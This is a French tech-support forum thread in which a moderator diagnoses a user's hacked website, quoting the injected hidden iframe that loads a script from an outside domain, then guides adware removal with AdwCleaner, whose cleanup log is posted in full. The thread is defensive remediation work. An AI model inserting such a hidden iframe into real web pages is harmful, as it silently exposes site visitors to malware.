Infecté par (WebPage.Gen3)

Résolu/Fermé
latruf - Modifié par latruf le 19/12/2013 à 14:25
latruff Messages postés 58 Date d'inscription mardi 19 août 2008 Statut Membre Dernière intervention 25 juin 2015 - 13 janv. 2014 à 17:02
Bonjour,

depuis quelque temps je suis infecter par " HTML/Infected.WebPage.Gen3 " qui s'est loger sur mon site et les fichier de création de mon site.

résultat mon site a été provisoirement stoppé par google et je ne peux utilisé mes fichiers en local sur mon ordi .

d'après mes recherche mon antivirus avira antivir ,y serai "peut être" pour quelque chose mais je suis pas un expert.

pouvez vous m'aidez a me débarrasser de ce virus car ça devient urgent et l'ordi ram de plus en plus ?

merci de votre aide.



16 réponses

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 658
19 déc. 2013 à 14:24
Salut,

Quelle adresse le site ?
0
avalonestudio.fr
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 658
19 déc. 2013 à 15:03
c'est cette iframe qui fait réagir les antivirus, probablement inséré par des pirates pour infecter les visiteurs

</html><iframe src="http://luxilla.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

https://www.virustotal.com/gui/file/f42e5d72223a71281d2368802cdd2cfa01f295591d0421fcc83d62e0741efde0

il faut retirer ce code ou remettre une sauvegarde non infectée du site.
Change tes mots de passe FTP et vérifie le contenu qu'il n'y a pas une page PHP contenant un shell.
0
sais tu comment je fais pour le localiser ? dans quel fichier ou sur quel page elle se trouve ?
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 658
19 déc. 2013 à 16:53
nope je peux pas répondre à la question, le code peut-être différent dans la page ou un script peux le gérer.
Bref y a divers moyen de s'y prendre.
Faut que tu cherches.
0
ok pour ca, pense tu que mon fichier d'origine soit infecter aussi ?

est ce que si je re-exporte les fichiers (index et les autre page) je puisse l'enlever ? en utilisant le logiciel qui a servi a cree les pages.
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 658
19 déc. 2013 à 17:28
Peut-être, je sais pas de quand datent tes fichiers etc.
0
ok je vais deja essayer ca pour le site.

je te tiens au courrant
0
latruff Messages postés 58 Date d'inscription mardi 19 août 2008 Statut Membre Dernière intervention 25 juin 2015
11 janv. 2014 à 16:25
salut,

ok c'est bon j'ai fait la manipe, après validation de google, tous re fonctionne normalement.

mon site est de nouveau en ligne et l'antivirus ne détecte plus rien.

par contre je croix que j'ai hériter d'une autre cochonnerie en échange, j'ai des pages qui s'ouvre toute seule.

lorsque je clique sur sur une page ou un élément de la page (une photo, un texte..) une autre page s'ouvre.

vous pouvez m'aider ?
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 658
11 janv. 2014 à 17:30
quelle autre page ?
0
latruff Messages postés 58 Date d'inscription mardi 19 août 2008 Statut Membre Dernière intervention 25 juin 2015
12 janv. 2014 à 11:46
des pages internet,

l'explorateur qu'y m'ouvre d'autre pages, de se que je me souviens car je les ferme immédiatement, comment gagner de l'argent en faisant je sais pas quoi, un truc pour les impôts, ou un truc sur des jeux en ligne etc..
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 658
12 janv. 2014 à 11:59
Suis ce tutorial https://www.malekal.com/adwcleaner-supprimer-virus-adwares-pup/?t=33839&start= AdwCleaner ( d'Xplode ) sur ton bureau.
Aide en vidéo : https://www.youtube.com/watch?feature=player_embedded&v=xx_y4PEr1eU

Vas sur le lien, télécharge AdwCleaner comme indiqué.
Lance AdwCleaner, clique sur [Scanner].
Le scan peux durer plusieurs minutes, patienter.
Une fois le scan terminé, clique sur [Nettoyer]

Une fois le nettoyage terminé, un rapport s'ouvrira. Copie/colle le contenu du rapport dans ta prochaine réponse par un copier/coller.
Si cela ne fonctionne pas, utilise le site http://pjjoint.malekal.com pour héberger le rapport, donne le lien du rapport dans un nouveau message.

Note : Le rapport est également sauvegardé sous C:\AdwCleaner[S1].txt


puis la liste des extensions :
==============================

Tu utilises quel navigateur pour surfer ?

Si Firefox et/ou Chrome sont installés :

Sur Firefox : Menu Outils / Modules complémentaires
Onglet Extension.
Donne la liste.

Sur Google Chrome : Menu en haut à droite puis Outils / Extensions
Donne la liste.
0
latruff Messages postés 58 Date d'inscription mardi 19 août 2008 Statut Membre Dernière intervention 25 juin 2015
12 janv. 2014 à 18:08
# AdwCleaner v3.016 - Rapport créé le 12/01/2014 à 12:11:07
# Mis à jour le 23/12/2013 par Xplode
# Système d'exploitation : Windows Vista (TM) Business Service Pack 2 (32 bits)
# Nom d'utilisateur : Avalone - PC-DE-AVALONE
# Exécuté depuis : C:\Users\Avalone\Desktop\adwcleaner.exe
# Option : Nettoyer

***** [ Services ] *****


***** [ Fichiers / Dossiers ] *****

Dossier Supprimé : C:\Program Files\HDvidCodec.com
Dossier Supprimé : C:\Users\Avalone\AppData\Roaming\OpenCandy
Dossier Supprimé : C:\Users\Avalone\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HDvidCodec.com
Fichier Supprimé : C:\END
Fichier Supprimé : C:\Users\Avalone\Desktop\HDVidCodec.lnk
Fichier Supprimé : C:\Users\Avalone\AppData\Roaming\Mozilla\Firefox\Profiles\yx0fl9ir.default\searchplugins\Web Search.xml
Fichier Supprimé : C:\Users\Avalone\AppData\Roaming\Mozilla\Firefox\Profiles\yx0fl9ir.default\user.js

***** [ Raccourcis ] *****


***** [ Registre ] *****

Clé Supprimée : HKCU\Software\Classes\pokki
Clé Supprimée : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\wajam.com
Clé Supprimée : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Clé Supprimée : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_5045&SUBSYS_17AA20DA
Clé Supprimée : HKLM\SOFTWARE\Classes\CLSID\{00000001-4FEF-40D3-B3FA-E0531B897F98}
Clé Supprimée : HKLM\SOFTWARE\Classes\CLSID\{64697678-0000-0010-8000-00AA00389B71}
Clé Supprimée : HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{0F6E720A-1A6B-40E1-A294-1D4D19F156C8}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{0F6E720A-1A6B-40E1-A294-1D4D19F156C8}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Clé Supprimée : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Valeur Supprimée : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{AE07101B-46D4-4A98-AF68-0333EA26E113}]
Clé Supprimée : HKCU\Software\1ClickDownload
Clé Supprimée : HKCU\Software\Softonic
Clé Supprimée : HKCU\Software\YahooPartnerToolbar
Clé Supprimée : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\1ClickDownload
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{79A765E1-C399-405B-85AF-466F52E918B0}
Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\1ClickDownload
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0CFE535C35F99574E8340BFA75BF92C2
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0E12F736682067FDE4D1158D5940A82E
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0FF2AEFF45EEA0A48A4B33C1973B6094
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A24B5BB8521B03E0C8D908F5ABC0AE6
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\261F213D1F55267499B1F87D0CC3BCF7
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2B0D56C4F4C46D844A57FFED6F0D2852
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\305B09CE8C53A214DB58887F62F25536
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\49D4375FE41653242AEA4C969E4E65E0
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6AA0923513360135B272E8289C5F13FA
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6F7467AF8F29C134CBBAB394ECCFDE96
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\741B4ADF27276464790022C965AB6DA8
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7DE196B10195F5647A2B21B761F3DE01
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\922525DCC5199162F8935747CA3D8E59
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9D4F5849367142E4685ED8C25E44C5ED
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5875B04372C19545BEB90D4D606C472
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A876D9E80B896EC44A8620248CC79296
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B66FFAB725B92594C986DE826A867888
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BCDA179D619B91648538E3394CAC94CC
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D677B1A9671D4D4004F6F2A4469E86EA
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DD1402A9DD4215A43ABDE169A41AFA0E
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E36E114A0EAD2AD46B381D23AD69CDDF
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EF8E618DB3AEDFBB384561B5C548F65E
Clé Supprimée : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\F928123A039649549966D4C29D35B1C9

***** [ Navigateurs ] *****

-\\ Internet Explorer v8.0.6001.19483

Paramètre Restauré : HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
Paramètre Restauré : HKCU\Software\Microsoft\Internet Explorer\Main [Search Bar]
Paramètre Restauré : HKCU\Software\Microsoft\Internet Explorer\Search [Default_Search_URL]
Paramètre Restauré : HKCU\Software\Microsoft\Internet Explorer\Search [SearchAssistant]
Paramètre Restauré : HKCU\Software\Microsoft\Internet Explorer\SearchUrl [Default]
Paramètre Restauré : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchUrl [Default]

-\\ Mozilla Firefox v26.0 (fr)

[ Fichier : C:\Users\Avalone\AppData\Roaming\Mozilla\Firefox\Profiles\yx0fl9ir.default\prefs.js ]

Ligne Supprimée : user_pref("extensions.crossrider.bic", "1427cdc73257d9850c2d92b3e0fd3d5c");
Ligne Supprimée : user_pref("extensions.enabledItems", "helperbar@helperbar.com:1.0,{b9db16a4-6edc-47ec-a1f4-b86292ed211d}:4.9.9,{3112ca9c-de6d-4884-a869-9855de68056c}:7.1.20110512W,{CAFEEFAC-0016-0000-0007-ABCDEFFEDCB[...]
Ligne Supprimée : user_pref("extensions.helperbar.DockingPositionDown", false);
Ligne Supprimée : user_pref("extensions.helperbar.SmartbarDisabled", false);
Ligne Supprimée : user_pref("extensions.helperbar.SmartbarStateMinimaized", false);
Ligne Supprimée : user_pref("extensions.wrc.SearchRules.rambler.ru.style", ".WRCN {display:none} .search-results .title + .WRCN {display:inline !important; background: url(\"IMAGE\") right no-repeat}");
Ligne Supprimée : user_pref("keyword.URL", "hxxp://feed.helperbar.com/?publisher=OC&dpid=OC&co=TJ&userid=33b9e012-4095-436d-8c1a-273504b3dbf6&affid=111585&searchtype=ds&babsrc=lnkry&q=");

*************************

AdwCleaner[R0].txt - [9509 octets] - [12/01/2014 12:09:24]
AdwCleaner[S0].txt - [8578 octets] - [12/01/2014 12:11:07]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [8638 octets] ##########


la liste dees module firefox :

adobe acrobat 10.1.8.24
divX web player 1.4.2.7 (je soupssone celui la)
google hearth plugin 7.2.2041
google update 1.3.22.3
itune application detector 1.0.1.1
java deployment toolkit 7.0.450.18 10.45.2.18
java(TM) platform se U45 10.45.2.18
picasa 3.0.0.0
quiqtime plugin 7.6.9. 7.6.9.0
shockwave flash 11.9.900.170
shockwave for director 12.0.7.148
shockwave for director 11.5.6.606
silverlight plug-in 5.1.20913.0
VLC multimedia plugin 0.8.6.0
windows presentation foundation 3.5.30729.1
yahoo application plugin 1.0.0.7
zylom plugin 2.0.0.1
0
latruff Messages postés 58 Date d'inscription mardi 19 août 2008 Statut Membre Dernière intervention 25 juin 2015
12 janv. 2014 à 18:12
oups c'es pas la extention je mis , les voila :

add-on compatibilité reporter 2.0.1
downloadhelper 4.9.21
fd plugin initial.rev111
translate this 3.0.1
wiktionary and google translate 7.0
google toolbar for firefox 7.1.20110512w (desactivé car incompatible)
microsoft.net framwork assistant 1.2.1 (desactivé car incompatible)
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 658
Modifié par Malekal_morte- le 13/01/2014 à 09:17
Supprime :
fd plugin initial.rev111
google toolbar for firefox

Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
0
latruff Messages postés 58 Date d'inscription mardi 19 août 2008 Statut Membre Dernière intervention 25 juin 2015
13 janv. 2014 à 11:47
ok c'est fait
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 658
13 janv. 2014 à 12:10
tu as encore des pubs qui s'ouvrent ?
0
latruff Messages postés 58 Date d'inscription mardi 19 août 2008 Statut Membre Dernière intervention 25 juin 2015
13 janv. 2014 à 12:48
pas pour l'instant

je desinstal adwcleaner ?
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 658
13 janv. 2014 à 13:40
oui :)

A lire - Programmes parasites / PUPs : https://www.malekal.com/adwares-pup-protection/

0
latruff Messages postés 58 Date d'inscription mardi 19 août 2008 Statut Membre Dernière intervention 25 juin 2015
13 janv. 2014 à 17:02
ok un grand merci pour ton aide
0